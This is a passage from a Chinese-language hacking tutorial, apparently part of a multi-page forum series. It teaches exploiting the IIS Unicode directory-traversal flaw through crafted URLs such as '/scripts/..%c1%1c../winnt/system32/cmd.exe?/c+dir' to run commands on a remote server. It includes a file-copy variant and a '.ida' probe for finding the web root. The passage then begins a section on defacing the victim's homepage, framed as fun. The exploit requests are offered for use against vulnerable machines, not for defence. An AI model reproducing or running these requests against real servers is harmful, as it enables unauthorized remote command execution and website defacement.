二，一切从基础开始

由于winnt\system32\cmd.exe的存在，使远程执行命令变为可能，在浏览器里输入以下请求：(假设11.11.22.22有漏洞）

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂，其实就是利用当中的非法请求使我们可以连到system32下，如果inetpub\目录不合winnt同盘，或者目录级数有改动，可能会引起请求失败。

如果成功，那么在浏览区可看到如下信息：

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. （假设目录中没有文件，实际上有一大堆）

是不是有自己机器的感觉了，正点！就是这种感觉！

cmd.exe相当与dos里的command.com，因此，我们可以执行很多命令了！

http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir （这个命令同样道理）

大家请注意：/c后面的+，实际上，他就是空格，请记牢！dir开始就是dos命令了，我们可以更改一下：

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

会dos的朋友一定懂其意义了，不懂的请去看书 .

不用说，大家也知道我们就可以利用它来对有漏洞的机器展开攻击了！

三，实战演练

1，修改主页！（是不是很爽？）

一般主页位置在c:\inetpub\wwwroot下，但要是改了路径，就需要找找了。

最方便的方法：在浏览器里输入 http://11.11.22.22/.ida要是有漏洞，那在浏览器里便会显示主页路径，这个漏洞存在率很高，自然是我们的首选。

分析法：用dir看各个盘符的根目录，看可疑的就进去看，运气好的在一分钟里找到，这要看运气和直觉。

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ... 下一页  >>